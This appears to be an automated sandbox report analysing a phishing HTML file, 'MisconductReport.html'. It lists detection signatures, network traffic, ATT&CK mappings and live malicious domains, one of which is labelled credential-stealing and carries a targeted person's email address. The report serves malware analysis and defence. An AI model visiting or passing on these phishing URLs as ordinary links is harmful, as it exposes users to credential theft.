Edit tour

Windows Analysis Report
MisconductReport.html

Overview

General Information

Sample name:	MisconductReport.html (renamed file extension from html_ to html)
Original sample name:	MisconductReport.html_
Analysis ID:	1398961
MD5:	f7b7a00aaf60d7f642c6369149cbe80d
SHA1:	a22bf2b37c7f625b5a01863c6ee4323368296574
SHA256:	4d03c35016abdcc771dc4e182e66ab4562c0b1f8a964b291e44e266d8f55e64d
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected javascript redirector / loader

HTML Script injector detected

Creates files inside the system directory

HTML page contains hidden URLs or javascript code

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Stores files to the Windows start menu directory

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6556 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\MisconductReport.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2148 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2228,i,2469113604388582169,10031896183917064165,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://horizon.sologerg.com/hihihji/#Ematt.r@ebizcharge.com

SlashNext: Label: Credential Stealing type: Phishing & Social Engineering

Phishing

Detected javascript redirector / loader

Source: MisconductReport.html

HTTP Parser: Low number of body elements: 0

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/MisconductReport.html

HTTP Parser: New script tag found

Source: https://horizon.sologerg.com/hihihji/#Ematt.r@ebizcharge.com

HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...

Source: file:///C:/Users/user/Desktop/MisconductReport.html	HTTP Parser: No favicon
Source: https://horizon.sologerg.com/hihihji/#Ematt.r@ebizcharge.com	HTTP Parser: No favicon
Source: https://horizon.sologerg.com/hihihji/#Ematt.r@ebizcharge.com	HTTP Parser: No favicon

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:49739 version: TLS 1.2

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91

Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /hihihji/ HTTP/1.1Host: horizon.sologerg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: horizon.sologerg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://horizon.sologerg.com/hihihji/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /hihihji/ HTTP/1.1Host: horizon.sologerg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: nvohxxicwod.trcvtoke.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://horizon.sologerg.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://horizon.sologerg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /BBPD10KJ4COSR2J92DMZHPB2JKQ9PX-qliezfq46gnh-dist31o6dw0?TB54CRC5PDRGQOFM023B80CHXA9BS0-sdk22iw1h43e-lfztdonl8mj0qo HTTP/1.1Host: horizon.sologerg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://horizon.sologerg.com/hihihji/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZpZWtES3BFdzhRQysxUUMzUHVEeXc9PSIsInZhbHVlIjoibWkvbWxyeHlPR2VFN2ZhSzBUZC80NVc2WkxoWHJpem1jQU94V1BXMFM1SlRvTHZFY3pNVU9iY1JKdFNsaVNWTzVOUVQvKzRra0NPdlpFcHhoZkZ0NjJHVC9KcmlhNXlkbEQ1Y1dBK1lsY0RweFR4S1hNcFlza1NoQnJGcHlEZVYiLCJtYWMiOiI3YTA0ODQ2Njk5ODE5OGU0MzA3ODdlZjVlYmMyNDEwZWMxZmNjNTk2OWEwNDBmYmM3MTdhMzEwYzVkZTZjNWQwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Img3Q3c2YWlUcnV0eDhmYStUUStEbVE9PSIsInZhbHVlIjoiSDVHcUFMcXpEbWNDQWVKZ3NObU9LdEVTYWdManhtTStkZVU4TDNkTG1lenZVamZ1T0FLdklZMkZldTF6S2hUUWk1bXU4dWd5Y1hkNGY3NEdNUDA2bzQvL3V6cTdCRSttamlKSmt0QnUrdUlOQ1BadnNrVGtYN09IRmo0c1ZjYW0iLCJtYWMiOiI3MmFjOGNjZjljZmU1ZTZkMjgzOWQyYjJiM2IzMGVhNWZjOGVhMzBiYzAwOWI2ODE4M2MwNmViNjRhYTlmMjNlIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: nvohxxicwod.trcvtoke.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=mzVhl74nkCCh8Eb&MD=PWmU1UxS HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=mzVhl74nkCCh8Eb&MD=PWmU1UxS HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000798875FE8C HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br

Source: unknown

DNS traffic detected: queries for: horizon.sologerg.com

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Feb 2024 17:12:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l%2Fmjx%2FGUaeB8U48LlYJnrEEI%2FJi%2FwRyC63ZriRj2xv%2Bn27zPYBNXds6BqwMVwR09s%2BRoJe18lOBQ2XtGQy17xuUrrGXlyde20VfLtBvFCFg4cGE2nQ7%2BXlzckhHc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 85b9d08699103b20-IAD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Feb 2024 17:12:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rxg2wLNOqsUkNdECmNqpR0ejq5GBwBzX%2BnW5Q7lkAXEuqaE4BPWmxV2h%2BfanqVw6lfP4f3ZraHDprxL8D3yui5pf6NjYjS8oeB2uOTeM4MCTB046ZCaTWR8CvXL%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 85b9d0bc5d633b92-IAD

Source: chromecache_81.2.dr

String found in binary or memory: https://nvohxxicwod.trcvtoke.ru

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:49739 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_BITS_6556_711273317

Jump to behavior

Source: classification engine

Classification label: mal56.phis.winHTML@30/11@16/12

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\MisconductReport.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2228,i,2469113604388582169,10031896183917064165,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2228,i,2469113604388582169,10031896183917064165,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	11 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://horizon.sologerg.com/hihihji/#Ematt.r@ebizcharge.com	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering
https://horizon.sologerg.com/hihihji/	0%	Avira URL Cloud	safe
https://horizon.sologerg.com/BBPD10KJ4COSR2J92DMZHPB2JKQ9PX-qliezfq46gnh-dist31o6dw0?TB54CRC5PDRGQOFM023B80CHXA9BS0-sdk22iw1h43e-lfztdonl8mj0qo	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/MisconductReport.html	0%	Avira URL Cloud	safe
https://horizon.sologerg.com/favicon.ico	0%	Avira URL Cloud	safe
https://nvohxxicwod.trcvtoke.ru/	0%	Avira URL Cloud	safe
